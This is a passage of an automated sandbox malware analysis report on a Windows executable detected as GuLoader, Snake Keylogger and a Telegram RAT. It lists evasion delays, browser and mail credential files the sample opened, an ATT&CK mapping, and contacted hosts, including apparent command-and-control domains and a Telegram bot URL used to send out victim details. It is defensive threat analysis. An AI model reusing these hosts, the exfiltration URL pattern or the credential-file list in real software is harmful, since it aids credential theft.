            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 594312Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 594203Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 594093Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 593984Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 593874Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 593765Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 593656Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeWindow / User API: threadDelayed 1533Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeWindow / User API: threadDelayed 8324Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsd854F.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeAPI coverage: 1.7 %
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -24903104499507879s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -599890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 5692Thread sleep count: 1533 > 30Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 5692Thread sleep count: 8324 > 30Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -599780s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -599671s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -599562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -599452s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -599343s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -599234s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -599124s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -599015s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -598906s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -598796s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -598687s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -598578s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -598468s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -598304s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -598201s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -598082s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -597734s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -597334s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -597078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -596930s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -596828s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -596718s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -596609s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -596500s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -596390s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -596281s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -596171s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -596062s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -595953s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -595843s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -595734s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -595621s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -595515s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -595406s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -595296s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -595187s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -595078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -594968s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -594859s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -594749s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -594637s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -594531s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -594421s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -594312s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -594203s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -594093s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -593984s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -593874s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -593765s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe TID: 4284Thread sleep time: -593656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 1_2_00402910 FindFirstFileW,1_2_00402910
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 1_2_004069DF FindFirstFileW,FindClose,1_2_004069DF
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 1_2_00405D8E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405D8E
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_00402910 FindFirstFileW,8_2_00402910
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_004069DF FindFirstFileW,FindClose,8_2_004069DF
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_00405D8E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,8_2_00405D8E
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 599780Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 599671Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 599452Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 599343Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 599234Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 599124Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 599015Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 598906Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 598796Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 598687Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 598578Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 598468Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 598304Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 598201Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 598082Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 597734Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 597334Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 597078Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 596930Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 596828Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 596718Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 596609Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 596500Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 596390Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 596281Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 596171Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 596062Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 595953Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 595843Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 595734Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 595621Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 595515Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 595406Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 595296Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 595187Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 595078Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 594968Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 594859Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 594749Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 594637Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 594531Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 594421Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 594312Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 594203Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 594093Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 593984Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 593874Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 593765Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 593656Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
            Source: OW1i3n5K3s.exe, 00000008.00000002.2478960805.0000000002629000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: OW1i3n5K3s.exe, 00000008.00000002.2478960805.0000000002629000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWgs
            Source: OW1i3n5K3s.exe, 00000008.00000002.2478960805.00000000025D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx|c
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeAPI call chain: ExitProcess graph end nodegraph_1-4451
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeAPI call chain: ExitProcess graph end nodegraph_1-4680
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 1_2_6EDC1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,1_2_6EDC1BFF
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess created: C:\Users\user\Desktop\OW1i3n5K3s.exe "C:\Users\user\Desktop\OW1i3n5K3s.exe"Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeQueries volume information: C:\Users\user\Desktop\OW1i3n5K3s.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 1_2_00403645 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403645
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 00000008.00000002.2505212840.0000000032E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Yara detected Telegram RAT
            Source: Yara matchFile source: Process Memory Space: OW1i3n5K3s.exe PID: 8128, type: MEMORYSTR
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 00000008.00000002.2505212840.0000000032F8B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: OW1i3n5K3s.exe PID: 8128, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 00000008.00000002.2505212840.0000000032E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Yara detected Telegram RAT
            Source: Yara matchFile source: Process Memory Space: OW1i3n5K3s.exe PID: 8128, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API            		1
            DLL Side-Loading            		1
            Access Token Manipulation            		11
            Masquerading            		1
            OS Credential Dumping            		21
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Web Service            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
            Process Injection            		1
            Disable or Modify Tools            		LSASS Memory31
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Archive Collected Data            		21
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		31
            Virtualization/Sandbox Evasion            		Security Account Manager1
            Application Window Discovery            		SMB/Windows Admin Shares1
            Data from Local System            		3
            Ingress Tool Transfer            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Access Token Manipulation            		NTDS1
            System Network Configuration Discovery            		Distributed Component Object Model1
            Clipboard Data            		3
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Process Injection            		LSA Secrets4
            File and Directory Discovery            		SSHKeylogging14
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information            		Cached Domain Credentials215
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            OW1i3n5K3s.exe75%VirustotalBrowse
            OW1i3n5K3s.exe66%ReversingLabsWin32.Trojan.GuLoader

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsd854F.tmp\System.dll0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://api.telegram0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            		142.250.184.206
            		truefalse
              		high
              drive.usercontent.google.com
              		172.217.16.129
              		truefalse
                		high
                reallyfreegeoip.org
                		104.21.32.1
                		truefalse
                  		high
                  api.telegram.org
                  		149.154.167.220
                  		truefalse
                    		high
                    checkip.dyndns.com
                    		132.226.8.169
                    		truefalse
                      		high
                      checkip.dyndns.org
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://reallyfreegeoip.org/xml/8.46.123.189false
                          		high
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%2009/03/2025%20/%2001:02:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                            		high
                            http://checkip.dyndns.org/false
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://www.office.com/OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003300F000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://duckduckgo.com/ac/?q=OW1i3n5K3s.exe, 00000008.00000002.2507519072.000000003414F000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://api.telegram.orgOW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000033063000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032F66000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://api.telegram.org/botOW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003305B000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032F66000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.office.com/lBOW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000033019000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=OW1i3n5K3s.exe, 00000008.00000002.2507519072.000000003414F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://ac.ecosia.org?q=OW1i3n5K3s.exe, 00000008.00000002.2507519072.000000003414F000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://drive.usercontent.google.com/OW1i3n5K3s.exe, 00000008.00000003.1455368440.0000000002640000.00000004.00000020.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2478960805.000000000263F000.00000004.00000020.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000003.1455467642.0000000002645000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://checkip.dyndns.orgOW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003303E000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003302B000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003304C000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032E81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=OW1i3n5K3s.exe, 00000008.00000002.2507519072.000000003414F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://chrome.google.com/webstore?hl=en4OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032FED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://nsis.sf.net/NSIS_ErrorErrorOW1i3n5K3s.exefalse
                                                      		high
                                                      https://api.telegram.org/bot/sendMessage?chat_id=&text=OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003305B000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032F66000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://chrome.google.com/webstore?hl=enOW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032FED000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.000000003301E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://varders.kozow.com:8081OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032E81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://aborters.duckdns.org:8081OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000032E81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.google.comOW1i3n5K3s.exe, 00000008.00000003.1403195156.0000000002647000.00000004.00000020.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000003.1403547568.0000000002647000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
